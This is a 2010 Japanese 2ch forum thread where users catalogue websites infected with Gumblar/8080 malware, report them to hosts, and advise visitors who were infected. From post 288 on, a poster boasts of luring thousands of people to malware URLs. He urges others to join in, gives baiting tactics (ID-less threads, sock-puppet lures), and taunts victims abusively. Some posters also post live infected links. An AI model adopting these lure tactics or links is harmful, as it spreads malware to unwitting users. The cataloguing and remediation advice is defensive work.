検出のされにくさとか関係ないんだよね?
246:名無しさん@お腹いっぱい。
10/03/19 18:10:37
>>225
www●i-paradise5●jp/~simple/otona/index●php → 電話が繋がらないのでパス
www●kadoma-c●com → 上流に凸、既に別の有志より連絡が有ったとの事
www●kikuyakikai●com → >>244
www●sesica●co●jp → 上流に凸完了
247:名無しさん@お腹いっぱい。
10/03/19 18:15:39
一休み
248:名無しさん@お腹いっぱい。
10/03/19 18:42:47
>>245
AvastとMSEの組み合わせで起きるかは知らんが
昔流行ったセキュリティブログで紹介された
Avast(常駐ガードオフでシールドはオン)+AntiVirでダブルエンジン()というやつでは
検出できずにスルーしたという話があった気がする
249:名無しさん@お腹いっぱい。
10/03/20 12:26:24
twentyfour-24●com
250:名無しさん@お腹いっぱい。
10/03/20 12:36:22
www●jde-net●co●jp
ここも電話してもやる気のない対応
これが社長なんだから笑う
251:名無しさん@お腹いっぱい。
10/03/20 12:40:36
おまいらこんなにどうやって見つけるの?
252:名無しさん@お腹いっぱい。
10/03/20 12:47:20
www●jc-consulting●jp
www●e-kudamono●co●jp
253:名無しさん@お腹いっぱい。
10/03/20 13:30:14
www●pflaster●jp/2009/12/
254:名無しさん@お腹いっぱい。
10/03/20 14:10:19
>>250
味噌県の人間なんてそんなもんだ
255:orz=3
10/03/20 14:25:00
we-rank●com/modules/bulletin1/rss●php
kallook●com
www●trajal●net/PR/index●html
--
www●bestofunder●com ←(笑)
256:名無しさん@お腹いっぱい。
10/03/20 14:27:46
>>249
コレはレンタルサーバかな?
全滅してる。
URLリンク(www.google.com)
257:名無しさん@お腹いっぱい。
10/03/20 14:33:17
>>256
レン鯖じゃないよ。
誰かろりぽ通報頼んだ
258:名無しさん@お腹いっぱい。
10/03/20 15:54:15
>>256
まじだwww
全部にこのサイトはコンピューターに(ry
259:名無しさん@お腹いっぱい。
10/03/20 16:55:36
SEOばっかりだ
260:名無しさん@お腹いっぱい。
10/03/20 16:56:18
umai●kitcut●org/omegatukau/
定番xrea
261:名無しさん@お腹いっぱい。
10/03/20 18:49:26
全部感染してたらSEOも糞も無いという。
Google先生もいっそのこと検索結果から消してしまえばいいのに。
262:名無しさん@お腹いっぱい。
10/03/20 21:24:50
>>256
ふつくしい…
263:名無しさん@お腹いっぱい。
10/03/20 21:49:39
素人だからよくわからんが、オーキタ家具とかいう家具屋さんのHP見てたら、
ウイルスバスターさんから感染の警告きた・・・ もしかしてそのサイトウイルスばらまいてる?
264:名無しさん@お腹いっぱい。
10/03/20 21:58:31
>>263
感染してますね
265:名無しさん@お腹いっぱい。
10/03/20 22:05:56
やっぱり・・・
266:名無しさん@お腹いっぱい。
10/03/20 23:24:15
オーキタ家具(絶賛放流中)
www●o-kitakagu●jp/
267:名無しさん@お腹いっぱい。
10/03/21 02:24:01
>>266
Lynxで問い合わせフォームからつーほーした。
common/js/base.js も ぁぅぁぅぁー
268:名無しさん@お腹いっぱい。
10/03/21 02:53:42
一向に下火にならんな
アホは、ウィルスサイトばらまいてるし
バカは、感染してると教えても再改ざんされるし
ここの人達の努力は、偉いよ
269:名無しさん@お腹いっぱい。
10/03/21 03:23:48
自分のPCが感染してるかどうかを簡単に調べる方法ありますか?
スタートアップにsiszyd32.exeとTMD.tmpがいなくてregedit.exeが起動できれば
感染してないってことになりますか?
270:名無しさん@お腹いっぱい。
10/03/21 04:11:56
スレの前の方に何か書いてあるぞ
271:名無しさん@お腹いっぱい。
10/03/21 06:38:36
>>269
いいえ
ありません
272:名無しさん@お腹いっぱい。
10/03/21 07:33:23
avastのブログに8080他の記事があった
URLリンク(blog.avast.com)
前菜が難読化Iframe、メインが8080本体でデザートが8080のスクリプト
「おいしい」メニューだって…
273:名無しさん@お腹いっぱい。
10/03/21 10:00:40
nagoya●cool●ne●jp/yukaridazou
274:コテハン
10/03/21 10:37:29
www●thaishin●co●jp/reform/index●html
www●knack●co●jp
ぁぅ・・・
URLリンク(www.google.co.jp)
275:コテハン
10/03/21 11:08:37
sandia●co●jp
www●hdta●jp
www●jc-consulting●jp/
閉鎖してもトロイの配布は止めないらしい・・・
www●daini-survey●com/
>誠に申し訳ありません。
>都合により、当ホームページを一時閉鎖させていただきます。
>これまで、当ホームページへアクセスいただき、有難うございました。
<<!-- \(^o^)/オワタ -->
276:263
10/03/21 12:15:52
263の素人なんですが、どうやら踏んでしまったので対策について教えてほしいです。FTPパスワードの変更ってのは具体的に何をしたらいいですか?
とりあえず、踏んでしまったので、しばらくオフラインで使用して、その後リカバリーしようかなっと思ってます。
OSが入っていないドライブもフォーマットしないとだめなんですかね?
あと踏んだ時のPCの状態を書いておきます。
ウイルスバスターから警告くる→いつの間にかウイルスが隔離されてる(時間情報からオーキタ家具HPと判断)→総合検索(クッキーしかひっかからず)
→シマンテックさん・マカフィーさんの無料検索サービスでもひっかからず→とりあえずここに報告→現状
環境:Windows7 Ultimate (Updata最新版)
アドビリーダーUPDATAがあったが、言語サービスだったので、おそらく関係なし
FLASHPLAYER:最新版
IE8:初期設定のまま
普通に侵入されました(泣)
277:名無しさん@お腹いっぱい。
10/03/21 12:26:25
釣り乙
278:名無しさん@お腹いっぱい。
10/03/21 12:29:35
はいはいフォーマットフォーマット
279:名無しさん@お腹いっぱい。
10/03/21 12:47:42
>>276
マジレスするとftpパスはウェブサイトをftpで管理してる人以外には関係ない
最低限システムドライブのフォーマットは必要だが
システム以外のドライブにウイルスのコピーが残ってないとは言えない
心配ならすべてのドライブをフォーマットするのが確実
280:263
10/03/21 13:19:21
>>279
なるほど、そういうことなんですね・・・ありがとう。
281:名無しさん@お腹いっぱい。
10/03/21 13:19:46
というかバスターが止めてくれたんなら問題ないでしょ
282:名無しさん@お腹いっぱい。
10/03/21 13:44:27
改竄?
URLリンク(www)●ibs-ishii-sports●co●jp/
全部消されてるのだが。
283:名無しさん@お腹いっぱい。
10/03/21 13:54:39
でもウイルスバスター入れてたら感染しないよ?
なんといっても販売本数No1だからね
284:名無しさん@お腹いっぱい。
10/03/21 13:57:23
>>276
ウイルスバスターが警告している時点で防いでるんじゃないか
脆弱性の対策もしているようだし感染はしていないだろ
285:名無しさん@お腹いっぱい。
10/03/21 14:23:52
>>276
>FLASHPLAYER:最新版
バージョンはちゃんと書こうね。「10.0.45.2」とか。
286:コテハン
10/03/21 14:50:49
ani-an●co●jp/
posh-e●com/index3●htm
minatomo●jp/
dxenglish●value-net●net
allgolf●web●fc2●com/a21 ←!
www●granship●com/index●html
287:名無しさん@お腹いっぱい。
10/03/21 19:09:02
hamu22●hp●infoseek●co●jp
jumpfine●com/hiesyo1/
www●clca●or●jp/club/ ←再感染
www●slowstylegym●com
288:('д') ◆yUyb3Tqn92
10/03/21 21:05:52
ちょっくら出張して
あらゆるスレで踏ませてきたぜb
(>w<)b俺GJ!
('д')ノシ AIONスレのみんなー♪みてるー♪
289:あんちたった
10/03/21 21:24:50
↑これ犯罪じゃね?
290:('д') ◆yUyb3Tqn92
10/03/21 21:41:16
>>289
('Д')え!?
('д')お前犯罪者なの?これってお前のことだよな
291:('д') ◆yUyb3Tqn92
10/03/21 21:42:42
まだまだ頑張るお
地雷マスターだおヽ('д')ノ今日だけで5000人以上に踏ませたお!
292:名無しさん@お腹いっぱい。
10/03/21 21:49:57
>>291
素直に感動。
そこまで出来る勇気が欲しい。
ん?快楽殺人と同じような考え?
取り敢えず影ながら応援。
293:('д') ◆yUyb3Tqn92
10/03/21 21:59:34
('д')なんか最近、本当に無知な奴が増えてきたよな
ウィルスURL踏ませるくらいじゃ罪には問われないんだぜ
それは俺がブログでも証明している
URLリンク(ruhuraro.blog57.fc2.com)
まぁこの状況でURL踏むのは不安って奴は
「ウィルス 踏ませることは犯罪か?」で検索してみろ
URLリンク(search.yahoo.co.jp)
294:('д') ◆yUyb3Tqn92
10/03/21 22:01:11
うーん
しかし前にブログでまとめた内容だと我ながらわかり難い内容になってるな
('`д´')よし、こりゃ近々また更新すっか!
今度スティッカムとかでウィルス踏ませる実況配信とかしてみよかな
295:名無しさん@お腹いっぱい。
10/03/21 22:02:40
>>293
いや踏ませたぐらいで犯罪にならないのは知ってるがwww
ただそれをする行為は快楽殺人と同じなのでは・・・と思っただけ。
俺は踏ませようとするだけで無理。
ブログは拝見させて貰ってる。
何故か惹かれる。
296:('д') ◆yUyb3Tqn92
10/03/21 22:07:03
殺人はおおげさだべ
まぁPC命な連中からしたら殺人的なのかもな
俺の影響でPC初期化しちまった奴に見つけ出して殺してやると言われたことも多々ある。
('д')俺様としてはただのゲーム感覚
踏ませる立場の心理は大体似たようなもんだろ
踏む奴は馬鹿、平和ボケ乙、ざまぁって感じだな
297:名無しさん@お腹いっぱい。
10/03/21 22:07:06
宣伝乙
298:名無しさん@お腹いっぱい。
10/03/21 22:11:28
何が俺様だよ。
299:('д') ◆yUyb3Tqn92
10/03/21 22:12:05
<('`д´')>俺様えっへん!
300:名無しさん@お腹いっぱい。
10/03/21 22:13:24
>>296
それは「殺す」って言った方が悪い。それは殺人予告だな。
それに常時ソフト(常識)付けずに安易に踏む香具師が悪い。
このガンブラーのご時世でさwwwww
俺も踏ませようかな・・・
一応そういうの好きな方。
301:('д') ◆yUyb3Tqn92
10/03/21 22:19:59
('д')ノ いいぞいいぞ!やっちゃえやっちゃえ!地雷デビューだー!
ちゃんと報告しろよ>w<踏ませるのもっと流行れ!
302:('д') ◆yUyb3Tqn92
10/03/21 22:21:10
<('`д´')>そしてまたエッヘン!
/ \
303:< ・、,,,;;,) ◆15oU7IjJp.
10/03/21 22:25:53
>>301
どこが狙い目?
304:('д') ◆yUyb3Tqn92
10/03/21 22:33:01
狙い目とかねーよ
適当に行き当たりばったりで楽しめばいいさ
ただ過疎過ぎるとこだと言うまでもなく反応がなくて駄目
貼ってすぐに↑ウィルスだから踏むな!
って書かれた場合は次へ移行すればいい
自演で誘導するのもいいし。
そうだ最初はIDのないスレでやってみれば良い('д')
305:名無しさん@お腹いっぱい。
10/03/21 22:40:41
>>304
お手本見せてよ。よく分からない
306:名無しさん@お腹いっぱい。
10/03/21 22:49:31
>>304
言いだしっぺなのになw
307:名無しさん@お腹いっぱい。
10/03/21 22:51:19
キモイのが粘着し始めたか
このスレももう終わりだな
308:('д') ◆yUyb3Tqn92
10/03/21 22:54:10
頭悪いなぁ
そのくらいのことも自分で考えられないようじゃただの低脳だぜ
それに残念ながら
手本ならさっき踏ませてきたのがあるからな('д')┌
スレリンク(net板:108番)n-
309:('д') ◆yUyb3Tqn92
10/03/21 22:57:06
>>307
うむ、お前も低脳だな
ウィルスURLが晒されてるスレをこの俺様こと、顔文字が見てるのは至極自然なことだお
( ´,дゝ`)少し考えればわかることでは~?ボホホホホホwww
310:('д') ◆yUyb3Tqn92
10/03/21 22:59:13
結局のとこ
俺様がゲーム感覚で行っていることも
常人にとってはとても難しいことだったりするわけか
てことはつまり・・・・
<('`д´')>またエッヘン!ってなるお!
/ \
311:名無しさん@お腹いっぱい。
10/03/21 23:00:12
>>308
一つのスレだけじゃ分からないよ
もっと詳しく教えてよ
312:('д') ◆yUyb3Tqn92
10/03/21 23:03:02
なにその低脳のワンパターンな発想
俺様に言われたことへ反論できず、仕方なくワンパターンな流れに逃げているのだな
ならこっちも目には目をワンパターンには・・・
<('`д´')>エッヘンパターンだお!!!!
/ \
313:名無しさん@お腹いっぱい。
10/03/21 23:07:03
>>311
お前煽り方が下手糞杉
この手のコテにそういう煽りは逆効果
余計調子に乗るだけ
314:< ・、,,,;;,) ◆15oU7IjJp.
10/03/21 23:08:39
>>312
質問系でやった。
結構楽しいコレwwww
315:('д') ◆yUyb3Tqn92
10/03/21 23:11:48
>>313
<('`д´')>な、なにーーーーー俺が調子に乗っているだとおおお?
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
316:('д') ◆yUyb3Tqn92
10/03/21 23:13:23
>>314
<(´'д'`)>やってきたスレを貼らないとな?
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
317:名無しさん@お腹いっぱい。
10/03/21 23:14:56
>>313
すまんかった。しかし春だからかな・・・・
318:< ・、,,,;;,) ◆15oU7IjJp.
10/03/21 23:17:37
>>316
スレリンク(body板:864番)
スレリンク(pcqa板:446番)
スレリンク(pcqa板:632番)
319:('д') ◆yUyb3Tqn92
10/03/21 23:19:23
>>317
<(´'Д'`)>ブワーッハッハッハッハ!!負け犬ザマァアア死ぬがよい!!!
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
320:名無しさん@お腹いっぱい。
10/03/21 23:21:28
意味がわからない
321:('д') ◆yUyb3Tqn92
10/03/21 23:25:41
>>318
('д')は?
まだ誰も踏んでねーじゃまいか
ただ貼っただけで誰も踏んでないしふぁびょってないではないか
貼っただけでお前は本気で楽しかったと言っているわけじゃあるまいな
( ´,дゝ`)=3 お前もう不合格だお
322:名無しさん@お腹いっぱい。
10/03/21 23:27:46
>>321
すまなかった・・・
そういう意味か・・・
分からなかった俺が悪いな。
一人でやるよ。
アドバイス有り難う。
ブログは読み続けるよ・・・
323:('д') ◆yUyb3Tqn92
10/03/21 23:42:50
('Д')おうよ!!!!
('д')
'д')
д')
'д')
д')
')
)
三'д')ノシ
324:('д') ◆yUyb3Tqn92
10/03/22 00:07:10
Дブワハハハハハ!!
ガンブラー最高だわ!
今回は踏んだ奴にウィルスだとネタ晴らしせずに放置しまくったぞ
いつもならウィルスでしたー>w<駆除ガンバ!
って俺がネタ晴らしするか、誰かしらがウィルスだと踏んでから気づくんだが
ガンブラーは踏んでもそれがウィルスだと気づかない奴ばかりだお>w<どうなることやらw
325:名無しさん@お腹いっぱい。
10/03/22 00:16:13
genoの違約金っていくら払うの?商品を返品したいんだけど
326:名無しさん@お腹いっぱい。
10/03/22 00:19:44
>>325
板違い
327:名無しさん@お腹いっぱい。
10/03/22 03:25:21
8080系のオペラで踏んじゃったけどJRE入れて無かったら感染しない?
328:名無しさん@お腹いっぱい。
10/03/22 04:52:06
VB2010が何も反応しなかったけど、そういうウィルスなの?
329:名無しさん@お腹いっぱい。
10/03/22 04:53:56
url貼ってみ
330:名無しさん@お腹いっぱい。
10/03/22 04:56:46
↑のゴミコテが貼ったと思われるサイトです。
URLリンク(www.i-paradise5.jp)
331:名無しさん@お腹いっぱい。
10/03/22 05:54:50
ζ
/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ~ン! また直リンしおって!
| _||||||||| |
\ / \_/ /
\____/
332:名無しさん@お腹いっぱい。
10/03/22 05:59:50
>>330
8080系ウィルス感染済
ちなみにウィルスバスターは対応遅いからバスターだけ信用するのはどうかと思う
対策ソフトがウィルスとまで言われたウィルスセキュリティ0と比べたら遥かにマシだけど
333:名無しさん@お腹いっぱい。
10/03/22 06:05:28
>>331
申し訳ない
>>332
特にサイト運営やFTPソフト使ってないんで気にしてないんですが、
OS、ドライブフォーマットしないと駆除できませんかね?
334:名無しさん@お腹いっぱい。
10/03/22 06:07:07
>>330
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
335:名無しさん@お腹いっぱい。
10/03/22 06:16:52
>>333
>>2-4の2を適用していれば無問題
336:名無しさん@お腹いっぱい。
10/03/22 06:25:41
>>335
わざわざすいません。
早速実施します。
337:名無しさん@お腹いっぱい。
10/03/22 06:48:16
>>336
いまからじゃ無駄
OS、ドライブフォーマットせい
338:('д') ◆yUyb3Tqn92
10/03/22 12:43:59
>>330>>336
('Д')ブウァハハッハハハッハハハハッハッハ!!!!!ザッマァアアア!!!!ヒャーッハー!
考えなしにウィルス踏むだけでも低脳なのに
俺に踏まされたことを俺が居るところで言ってるところがますます低脳だな>w<
そういう悔しそうな書き込みを見てしまうとますます俺様がヽ('Д')ノ 喜んでしまうではないか!!!!
しかもお前、挙句の果てにドライブフォーマットするしかないとまで言われちゃって・・・笑
('Д')ザッマァッァアァァアアみろ!死ねっ!!!お前のようなゴミはPCと一緒に焼却されてこいお(>w<)
おっとPCはリサイクルできるか
でもお前はもう焼却されて死ぬしかないべ?(>w<)そのくらい頭に血が上っているのでは~?W
339:('д') ◆yUyb3Tqn92
10/03/22 12:47:20
(*'д'*)あーウケタw
(*'д'*)まさか俺様にPC壊された低脳が来るとは・・・
・・・思ってたよ!!!!!(>w<)!!!!!
('д')今頃、せっかく休日なのに顔真っ赤にしてフォーマット作業してんだろな
340:('д') ◆yUyb3Tqn92
10/03/22 12:49:57
('д')そしてその間、俺様はというと
買い物行ったり、ゲームやったり、コーヒータイムを満喫したり、するわけだW
('`д´')な、わかったろ
正義は勝つということだよね。これが天才顔文字様とウィルスを踏んじゃう低脳どもの差なのだお。
341:('д') ◆yUyb3Tqn92
10/03/22 12:53:04
('д')ここでURL鑑定したり
URLまとめてる連中も同罪だな。
むしろ俺様がウィルス踏ませるのは良い事をしているがURLまとめてる奴は悪だぜ。
なぜならここで手に入れたURLを踏ませてる奴だっているわけだからな(>w<)
('д')え?どこって?さぁ~(笑)
そうだ、これ勇気スレにもマルチしとこっと
342:名無しさん@お腹いっぱい。
10/03/22 13:48:12
>>341
楽しいか?
よかったなカス
343:名無しさん@お腹いっぱい。
10/03/22 14:14:42
>341
pXXXX-XXXXXXXXhodogaya.kanagawa.ocn.ne.jp
344:名無しさん@お腹いっぱい。
10/03/22 14:17:18
>>343
341のIP?OCNだと困るな・・・
345:名無しさん@お腹いっぱい。
10/03/22 14:48:15
>>343
串だろそれ。
串は全規制されないかなぁ。
こんな基地外も串全規制すれば来ないんじゃね?
346:343
10/03/22 15:13:14
>>344-345
■network/ISP/OCN逆引きホスト地域割当表
URLリンク(wiki.tomocha.net)
>ipbf Bフレッツ
>神奈川県 hodogaya.kanagawa.ocn.ne.jp
pXXXX-ipbfXXXXhodogaya.kanagawa.ocn.ne.jp
<!-- ここにアフィ --!> とか・・・ワロタwww
347:名無しさん@お腹いっぱい。
10/03/22 17:41:59
なんかすげーのが沸いてる
348:名無しさん@お腹いっぱい。
10/03/22 17:56:48
ローカルあぼ~んも出来ないのかね、お前等
349:名無しさん@お腹いっぱい。
10/03/22 20:18:04
串サイトも危ないのかなあ
350:名無しさん@お腹いっぱい。
10/03/22 20:22:17
一般サイトも危ないのに串サイトなんて・・・
351:名無しさん@お腹いっぱい。
10/03/22 21:39:43
>>349
串使う事自体が頭おかしい
352:名無しさん@お腹いっぱい。
10/03/22 21:59:02
>>351
規制に巻き込まれた時にちょっと使うだけ・・・
353:名無しさん@お腹いっぱい。
10/03/22 22:26:30
>>352
代行レススレでいいじゃない
もしくは漫喫
354:名無しさん@お腹いっぱい。
10/03/22 23:19:12
●買えばいいよ
355:名無しさん@お腹いっぱい。
10/03/22 23:21:18
メモ用
URLリンク(www.jde-net.co.jp)
URLリンク(www.kikuyakikai.com)
356:名無しさん@お腹いっぱい。
10/03/22 23:33:19
ζ
/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ~ン! また直リンしおって!
| _||||||||| |
\ / \_/ /
\____/
357:名無しさん@お腹いっぱい。
10/03/22 23:43:16
ζ
/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ~ン! わしのAAを壊しおって!
| _||||||||| |
\ / \_/ /
\____/
358:名無しさん@お腹いっぱい。
10/03/22 23:49:07
直リンしたのはあちこちでウィルス踏ませてる顔文字さんのためでもあるのです
誰かがウイルスに感染するのって面白いし人の不幸はおまんこの味がするしね
じゃんじゃん感染してけばいいとおもうにだ
359:名無しさん@お腹いっぱい。
10/03/23 03:56:30
>>341,358
URLリンク(ja.wikipedia.org)
マルウェアの作者と手を組んでやってるんじゃなくて
おまいらが陥落サイトのURLを貼って「勝手に手助け」してるだけだから
>共犯独立性説に立った場合には、実行従属性は不要となり、
>幇助行為が行われた時点で犯罪は完成する。
釣ったやつが感染して、情報流出等の被害が出た場合・・・
訴えられたら逮捕されるだろうねぇ。
360:名無しさん@お腹いっぱい。
10/03/23 06:12:27
>>359
↑踏んじゃった人必死だなー
いくらふぁびょっても誰も逮捕されないから
結局お前は泣き寝入りするしかないのであーるw
361:名無しさん@お腹いっぱい。
10/03/23 06:32:29
犯罪者の弁
「こんなことで捕まるとは思ってなかった」
362:名無しさん@お腹いっぱい。
10/03/23 09:26:14
こんなアホでも捕まってくれると良いけどね